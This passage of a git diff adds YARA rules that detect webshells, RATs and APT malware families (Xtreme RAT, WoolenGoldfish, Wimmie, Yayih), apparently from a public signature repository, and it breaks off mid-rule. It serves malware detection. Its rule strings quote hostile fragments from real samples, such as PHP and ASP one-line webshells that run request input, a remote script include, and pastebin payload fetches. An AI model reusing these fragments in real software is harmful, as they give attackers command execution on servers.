+ $s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
+ $s5 = "VictimID = fm_NStr(Victims(i))"
+ condition:
+ all of them
+}
+rule screencap {
+ meta:
+ description = "Webshells Auto-generated - file screencap.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "51139091dea7a9418a50f2712ea72aa6"
+ strings:
+ $s0 = "GetDIBColorTable"
+ $s1 = "Screen.bmp"
+ $s2 = "CreateDCA"
+ condition:
+ all of them
+}
+rule FSO_s_phpinj_2 {
+ meta:
+ description = "Webshells Auto-generated - file phpinj.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "dd39d17e9baca0363cc1c3664e608929"
+ strings:
+ $s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
+ condition:
+ all of them
+}
+rule ZXshell2_0_rar_Folder_zxrecv {
+ meta:
+ description = "Webshells Auto-generated - file zxrecv.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
+ strings:
+ $s0 = "RyFlushBuff"
+ $s1 = "teToWideChar^FiYP"
+ $s2 = "mdesc+8F D"
+ $s3 = "\\von76std"
+ $s4 = "5pur+virtul"
+ $s5 = "- Kablto io"
+ $s6 = "ac#f{lowi8a"
+ condition:
+ all of them
+}
+rule FSO_s_ajan {
+ meta:
+ description = "Webshells Auto-generated - file ajan.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "22194f8c44524f80254e1b5aec67b03e"
+ strings:
+ $s4 = "entrika.write \"BinaryStream.SaveToFile"
+ condition:
+ all of them
+}
+rule c99shell {
+ meta:
+ description = "Webshells Auto-generated - file c99shell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "90b86a9c63e2cd346fe07cea23fbfc56"
+ strings:
+ $s0 = "<br />Input URL: <input name=\\\"uploadurl\\\" type=\\\"text\\\"&"
+ condition:
+ all of them
+}
+rule phpspy_2005_full {
+ meta:
+ description = "Webshells Auto-generated - file phpspy_2005_full.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "d1c69bb152645438440e6c903bac16b2"
+ strings:
+ $s7 = "echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
+ condition:
+ all of them
+}
+rule FSO_s_zehir4_2 {
+ meta:
+ description = "Webshells Auto-generated - file zehir4.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5b496a61363d304532bcf52ee21f5d55"
+ strings:
+ $s4 = "\"Program Files\\Serv-u\\Serv"
+ condition:
+ all of them
+}
+rule httpdoor {
+ meta:
+ description = "Webshells Auto-generated - file httpdoor.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "6097ea963455a09474471a9864593dc3"
+ strings:
+ $s4 = "''''''''''''''''''DaJKHPam"
+ $s5 = "o,WideCharR]!n]"
+ $s6 = "HAutoComplete"
+ $s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
+ condition:
+ all of them
+}
+rule FSO_s_indexer_2 {
+ meta:
+ description = "Webshells Auto-generated - file indexer.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "135fc50f85228691b401848caef3be9e"
+ strings:
+ $s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
+ condition:
+ all of them
+}
+rule HYTop_DevPack_2005 {
+ meta:
+ description = "Webshells Auto-generated - file 2005.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+ strings:
+ $s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
+ $s8 = "scrollbar-darkshadow-color:#9C9CD3;"
+ $s9 = "scrollbar-face-color:#E4E4F3;"
+ condition:
+ all of them
+}
+rule _root_040_zip_Folder_deploy {
+ meta:
+ description = "Webshells Auto-generated - file deploy.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "2c9f9c58999256c73a5ebdb10a9be269"
+ strings:
+ $s5 = "halon synscan 127.0.0.1 1-65536"
+ $s8 = "Obviously you replace the ip address with that of the target."
+
+ condition:
+ all of them
+}
+rule by063cli {
+ meta:
+ description = "Webshells Auto-generated - file by063cli.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "49ce26eb97fd13b6d92a5e5d169db859"
+ strings:
+ $s2 = "#popmsghello,are you all right?"
+ $s4 = "connect failed,check your network and remote ip."
+ condition:
+ all of them
+}
+rule icyfox007v1_10_rar_Folder_asp {
+ meta:
+ description = "Webshells Auto-generated - file asp.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "2c412400b146b7b98d6e7755f7159bb9"
+ strings:
+ $s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
+ condition:
+ all of them
+}
+rule FSO_s_EFSO_2_2 {
+ meta:
+ description = "Webshells Auto-generated - file EFSO_2.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a341270f9ebd01320a7490c12cb2e64c"
+ strings:
+ $s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+ $s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+ condition:
+ all of them
+}
+rule byshell063_ntboot_2 {
+ meta:
+ description = "Webshells Auto-generated - file ntboot.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
+ strings:
+ $s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
+ condition:
+ all of them
+}
+rule u_uay {
+ meta:
+ description = "Webshells Auto-generated - file uay.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
+ strings:
+ $s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
+ $s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
+ condition:
+ 1 of them
+}
+rule bin_wuaus {
+ meta:
+ description = "Webshells Auto-generated - file wuaus.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "46a365992bec7377b48a2263c49e4e7d"
+ strings:
+ $s1 = "9(90989@9V9^9f9n9v9"
+ $s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
+ $s3 = ";(=@=G=O=T=X=\\="
+ $s4 = "TCP Send Error!!"
+ $s5 = "1\"1;1X1^1e1m1w1~1"
+ $s8 = "=$=)=/=<=Y=_=j=p=z="
+ condition:
+ all of them
+}
+rule pwreveal {
+ meta:
+ description = "Webshells Auto-generated - file pwreveal.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b4e8447826a45b76ca45ba151a97ad50"
+ strings:
+ $s0 = "*<Blank - no es"
+ $s3 = "JDiamondCS "
+ $s8 = "sword set> [Leith=0 bytes]"
+ $s9 = "ION\\System\\Floating-"
+ condition:
+ all of them
+}
+rule shelltools_g0t_root_xwhois {
+ meta:
+ description = "Webshells Auto-generated - file xwhois.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "0bc98bd576c80d921a3460f8be8816b4"
+ strings:
+ $s1 = "rting! "
+ $s2 = "aTypCog("
+ $s5 = "Diamond"
+ $s6 = "r)r=rQreryr"
+ condition:
+ all of them
+}
+rule vanquish_2 {
+ meta:
+ description = "Webshells Auto-generated - file vanquish.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "2dcb9055785a2ee01567f52b5a62b071"
+ strings:
+ $s2 = "Vanquish - DLL injection failed:"
+ condition:
+ all of them
+}
+rule down_rar_Folder_down {
+ meta:
+ description = "Webshells Auto-generated - file down.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "db47d7a12b3584a2e340567178886e71"
+ strings:
+ $s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\" & Snet.ComputerName &"
+ condition:
+ all of them
+}
+rule cmdShell {
+ meta:
+ description = "Webshells Auto-generated - file cmdShell.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8a9fef43209b5d2d4b81dfbb45182036"
+ strings:
+ $s1 = "if cmdPath=\"wscriptShell\" then"
+ condition:
+ all of them
+}
+rule ZXshell2_0_rar_Folder_nc {
+ meta:
+ description = "Webshells Auto-generated - file nc.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
+ strings:
+ $s0 = "WSOCK32.dll"
+ $s1 = "?bSUNKNOWNV"
+ $s7 = "p@gram Jm6h)"
+ $s8 = "ser32.dllCONFP@"
+ condition:
+ all of them
+}
+rule portlessinst {
+ meta:
+ description = "Webshells Auto-generated - file portlessinst.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "74213856fc61475443a91cd84e2a6c2f"
+ strings:
+ $s2 = "Fail To Open Registry"
+ $s3 = "f<-WLEggDr\""
+ $s6 = "oMemoryCreateP"
+ condition:
+ all of them
+}
+rule SetupBDoor {
+ meta:
+ description = "Webshells Auto-generated - file SetupBDoor.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "41f89e20398368e742eda4a3b45716b6"
+ strings:
+ $s1 = "\\BDoor\\SetupBDoor"
+ condition:
+ all of them
+}
+rule phpshell_3 {
+ meta:
+ description = "Webshells Auto-generated - file phpshell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
+ strings:
+ $s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
+ $s5 = " echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
+ condition:
+ all of them
+}
+rule BIN_Server {
+ meta:
+ description = "Webshells Auto-generated - file Server.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
+ strings:
+ $s0 = "configserver"
+ $s1 = "GetLogicalDrives"
+ $s2 = "WinExec"
+ $s4 = "fxftest"
+ $s5 = "upfileok"
+ $s7 = "upfileer"
+ condition:
+ all of them
+}
+rule HYTop2006_rar_Folder_2006 {
+ meta:
+ description = "Webshells Auto-generated - file 2006.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "c19d6f4e069188f19b08fa94d44bc283"
+ strings:
+ $s6 = "strBackDoor = strBackDoor "
+ condition:
+ all of them
+}
+rule r57shell_3 {
+ meta:
+ description = "Webshells Auto-generated - file r57shell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "87995a49f275b6b75abe2521e03ac2c0"
+ strings:
+ $s1 = "<b>\".$_POST['cmd']"
+ condition:
+ all of them
+}
+
+
+rule HDConfig {
+ meta:
+ description = "Webshells Auto-generated - file HDConfig.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "7d60e552fdca57642fd30462416347bd"
+ strings:
+ $s0 = "An encryption key is derived from the password hash. "
+ $s3 = "A hash object has been created. "
+ $s4 = "Error during CryptCreateHash!"
+ $s5 = "A new key container has been created."
+ $s6 = "The password has been added to the hash. "
+ condition:
+ all of them
+}
+rule FSO_s_ajan_2 {
+ meta:
+ description = "Webshells Auto-generated - file ajan.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "22194f8c44524f80254e1b5aec67b03e"
+ strings:
+ $s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
+ $s3 = "/file.zip"
+ condition:
+ all of them
+}
+
+rule Webshell_and_Exploit_CN_APT_HK : Webshell
+{
+meta:
+ author = "Florian Roth"
+ description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
+ date = "10.10.2014"
+ score = 50
+strings:
+ $a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+ $s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
+ $s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
+condition:
+ $a0 or ( all of ($s*) )
+}
+
+rule JSP_Browser_APT_webshell {
+ meta:
+ description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
+ author = "F.Roth"
+ date = "10.10.2014"
+ score = 60
+ strings:
+ $a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+ $a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+ $a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+ $a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+ condition:
+ all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell {
+ meta:
+ description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+ author = "F.Roth"
+ date = "12.10.2014"
+ score = 60
+ reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+ strings:
+ $a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+ $a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+ condition:
+ all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell_2 {
+ meta:
+ description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+ author = "F.Roth"
+ date = "12.10.2014"
+ score = 60
+ reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+ strings:
+ $a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+ $a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+ $s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+ $s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+ condition:
+ all of ($a*) or all of ($s*)
+}
+
+rule AJAX_FileUpload_webshell {
+ meta:
+ description = "AJAX JS/CSS components providing web shell by APT groups"
+ author = "F.Roth"
+ date = "12.10.2014"
+ score = 75
+ reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
+ strings:
+ $a1 = "var frameId = 'jUploadFrame' + id;" ascii
+ $a2 = "var form = jQuery('<form action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
+ $a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii
+ condition:
+ all of them
+}
+
+rule Webshell_Insomnia {
+ meta:
+ description = "Insomnia Webshell - file InsomniaShell.aspx"
+ author = "Florian Roth"
+ reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+ date = "2014/12/09"
+ hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
+ score = 80
+ strings:
+ $s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+ $s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+ $s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+ $s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+ $s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+ $s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+ $s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+ $s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+ condition:
+ 3 of them
+}
+
+rule HawkEye_PHP_Panel {
+ meta:
+ description = "Detects HawkEye Keyloggers PHP Panel"
+ author = "Florian Roth"
+ date = "2014/12/14"
+ score = 60
+ strings:
+ $s0 = "$fname = $_GET['fname'];" ascii fullword
+ $s1 = "$data = $_GET['data'];" ascii fullword
+ $s2 = "unlink($fname);" ascii fullword
+ $s3 = "echo \"Success\";" fullword ascii
+ condition:
+ all of ($s*) and filesize < 600
+}
+
+rule SoakSoak_Infected_Wordpress {
+ meta:
+ description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+ reference = "http://goo.gl/1GzWUX"
+ author = "Florian Roth"
+ date = "2014/12/15"
+ score = 60
+ strings:
+ $s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+ $s1 = "function FuncQueueObject()" ascii fullword
+ $s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+ condition:
+ all of ($s*)
+}
+
+
+rule Pastebin_Webshell {
+ meta:
+ description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+ author = "Florian Roth"
+ score = 70
+ date = "13.01.2015"
+ reference = "http://goo.gl/7dbyZs"
+ strings:
+ $s0 = "file_get_contents(\"http://pastebin.com" ascii
+ $s1 = "xcurl('http://pastebin.com/download.php" ascii
+ $s2 = "xcurl('http://pastebin.com/raw.php" ascii
+
+ $x0 = "if($content){unlink('evex.php');" ascii
+ $x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+
+ $y0 = "file_put_contents($pth" ascii
+ $y1 = "echo \"<login_ok>" ascii
+ $y2 = "str_replace('* @package Wordpress',$temp" ascii
+ condition:
+ 1 of ($s*) or all of ($x*) or all of ($y*)
+}
+
+rule ASPXspy2 {
+ meta:
+ description = "Web shell - file ASPXspy2.aspx"
+ author = "Florian Roth"
+ reference = "not set"
+ date = "2015/01/24"
+ hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
+ strings:
+ $s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
+ $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+ $s3 = "Process[] p=Process.GetProcesses();" fullword ascii
+ $s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
+ $s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
+ $s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
+ $s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
+ $s8 = "Copyright © 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
+ $s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
+ $s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
+ $s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
+ $s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
+ $s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
+ $s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+ condition:
+ 6 of them
+}
diff --git a/malware/Wimmie.yar b/malware/Wimmie.yar
new file mode 100644
index 0000000..6313470
--- /dev/null
+++ b/malware/Wimmie.yar
@@ -0,0 +1,52 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WimmieShellcode : Wimmie Family
+{
+ meta:
+ description = "Wimmie code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-17"
+
+ strings:
+ // decryption loop
+ $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
+ $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
+
+ condition:
+ any of them
+}
+
+rule WimmieStrings : Wimmie Family
+{
+ meta:
+ description = "Strings used by Wimmie"
+ author = "Seth Hardy"
+ last_modified = "2014-07-17"
+
+ strings:
+ $ = "\x00ScriptMan"
+ $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii
+ $ = "ProbeScriptFint" wide ascii
+ $ = "ProbeScriptKids"
+
+ condition:
+ any of them
+
+}
+
+rule Wimmie : Family
+{
+ meta:
+ description = "Wimmie family"
+ author = "Seth Hardy"
+ last_modified = "2014-07-17"
+
+ condition:
+ WimmieShellcode or WimmieStrings
+
+}
diff --git a/malware/WoolenGoldfish.yar b/malware/WoolenGoldfish.yar
new file mode 100644
index 0000000..da8f93b
--- /dev/null
+++ b/malware/WoolenGoldfish.yar
@@ -0,0 +1,99 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule WoolenGoldfish_Sample_1 {
+ meta:
+ description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+ author = "Florian Roth"
+ reference = "http://goo.gl/NpJpVZ"
+ date = "2015/03/25"
+ score = 60
+ hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
+ strings:
+ $s1 = "Cannot execute (%d)" fullword ascii
+ $s16 = "SvcName" fullword ascii
+ condition:
+ all of them
+}
+
+rule WoolenGoldfish_Generic_1 {
+ meta:
+ description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+ author = "Florian Roth"
+ reference = "http://goo.gl/NpJpVZ"
+ date = "2015/03/25"
+ score = 90
+ super_rule = 1
+ hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
+ hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+ hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
+ strings:
+ $x0 = "Users\\Wool3n.H4t\\"
+ $x1 = "C-CPP\\CWoolger"
+ $x2 = "NTSuser.exe" fullword wide
+
+ $s1 = "107.6.181.116" fullword wide
+ $s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+ $s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+ $s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+ $s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+ $s6 = "wlg.dat" fullword
+ $s7 = "woolger" fullword wide
+ $s8 = "[Enter]" fullword
+ $s9 = "[Control]" fullword
+ condition:
+ ( 1 of ($x*) and 2 of ($s*) ) or
+ ( 6 of ($s*) )
+}
+
+rule WoolenGoldfish_Generic_2 {
+ meta:
+ description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+ author = "Florian Roth"
+ reference = "http://goo.gl/NpJpVZ"
+ date = "2015/03/25"
+ score = 90
+ hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+ hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+ hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+ hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
+ strings:
+ $s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+ condition:
+ all of them
+}
+
+rule WoolenGoldfish_Generic_3 {
+ meta:
+ description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+ author = "Florian Roth"
+ reference = "http://goo.gl/NpJpVZ"
+ date = "2015/03/25"
+ score = 90
+ hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
+ hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
+ strings:
+ $x1 = "... get header FATAL ERROR !!! %d bytes read > header_size" fullword ascii
+ $x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
+ $x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
+
+ $s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
+ $s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
+ $s2 = "Attempting to unlock uninitialized lock!" fullword ascii
+ $s4 = "unable to load kernel32.dll" fullword ascii
+ $s5 = "index.php?c=%S&r=%x" fullword wide
+ $s6 = "%s len:%d " fullword ascii
+ $s7 = "Encountered error sending syscall response to client" fullword ascii
+ $s9 = "/info.dat" fullword ascii
+ $s10 = "Error entering thread lock" fullword ascii
+ $s11 = "Error exiting thread lock" fullword ascii
+ $s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
+ condition:
+ ( 1 of ($x*) ) or
+ ( 8 of ($s*) )
+}
diff --git a/malware/Xtreme.yar b/malware/Xtreme.yar
new file mode 100644
index 0000000..1960b6a
--- /dev/null
+++ b/malware/Xtreme.yar
@@ -0,0 +1,112 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Xtreme
+{
+ meta:
+ description = "Xtreme RAT"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $string1 = /(X)tremeKeylogger/ wide ascii
+ $string2 = /(X)tremeRAT/ wide ascii
+ $string3 = /(X)TREMEUPDATE/ wide ascii
+ $string4 = /(S)TUBXTREMEINJECTED/ wide ascii
+
+ $unit1 = /(U)nitConfigs/ wide ascii
+ $unit2 = /(U)nitGetServer/ wide ascii
+ $unit3 = /(U)nitKeylogger/ wide ascii
+ $unit4 = /(U)nitCryptString/ wide ascii
+ $unit5 = /(U)nitInstallServer/ wide ascii
+ $unit6 = /(U)nitInjectServer/ wide ascii
+ $unit7 = /(U)nitBinder/ wide ascii
+ $unit8 = /(U)nitInjectProcess/ wide ascii
+
+ condition:
+ 5 of them
+}
+
+rule xtreme_rat : Trojan
+{
+ meta:
+ author="Kevin Falcoz"
+ date="23/02/2013"
+ description="Xtreme RAT"
+
+ strings:
+ $signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/
+
+ condition:
+ $signature1
+}
+
+rule XtremeRATCode : XtremeRAT Family
+{
+ meta:
+ description = "XtremeRAT code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-09"
+
+ strings:
+ // call; fstp st
+ $ = { E8 ?? ?? ?? ?? DD D8 }
+ // hiding string
+ $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
+
+ condition:
+ all of them
+}
+
+rule XtremeRATStrings : XtremeRAT Family
+{
+ meta:
+ description = "XtremeRAT Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-09"
+
+ strings:
+ $ = "dqsaazere"
+ $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
+
+ condition:
+ any of them
+}
+
+rule XtremeRAT : Family
+{
+ meta:
+ description = "XtremeRAT"
+ author = "Seth Hardy"
+ last_modified = "2014-07-09"
+
+ condition:
+ XtremeRATCode or XtremeRATStrings
+}
+
+rule xtremrat : rat
+{
+ meta:
+ author = "Jean-Philippe Teissier / @Jipe_"
+ description = "Xtrem RAT v3.5"
+ date = "2012-07-12"
+ version = "1.0"
+ filetype = "memory"
+
+ strings:
+ $a = "XTREME" wide
+ $b = "XTREMEBINDER" wide
+ $c = "STARTSERVERBUFFER" wide
+ $d = "SOFTWARE\\XtremeRAT" wide
+ $e = "XTREMEUPDATE" wide
+ $f = "XtremeKeylogger" wide
+ $g = "myversion|3.5" wide
+ $h = "xtreme rat" wide nocase
+ condition:
+ 2 of them
+}
+
+
diff --git a/malware/YahLover.yar b/malware/YahLover.yar
new file mode 100644
index 0000000..eafff47
--- /dev/null
+++ b/malware/YahLover.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YahLover : Worm
+{
+ meta:
+ author="Kevin Falcoz"
+ date="10/06/2013"
+ description="YahLover"
+
+ strings:
+ $signature1={42 00 49 00 54 00 52 00 4F 00 54 00 41 00 54 00 45 00 00 00 42 00 49 00 54 00 53 00 48 00 49 00 46 00 54 00 00 00 00 00 42 00 49 00 54 00 58 00 4F 00 52}
+
+ condition:
+ $signature1
+}
+
diff --git a/malware/Yayih.yar b/malware/Yayih.yar
new file mode 100644
index 0000000..751f566
--- /dev/null
+++ b/malware/Yayih.yar
@@ -0,0 +1,50 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YayihCode : Yayih Family
+{
+ meta:
+ description = "Yayih code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-11"
+
+ strings:
+ // encryption
+ $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
+
+ condition:
+ any of them
+}
+
+rule YayihStrings : Yayih Family
+{
+ meta:
+ description = "Yayih Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-11"
+
+ strings:
+ $ = "/bbs/info.asp"
+ $ = "\\msinfo.exe"
+ $ = "%s\\%srcs.pdf"
+ $ = "\\aumLib.ini"
+
+ condition:
+ any of them
+}
+
+rule Yayih : Family
+{
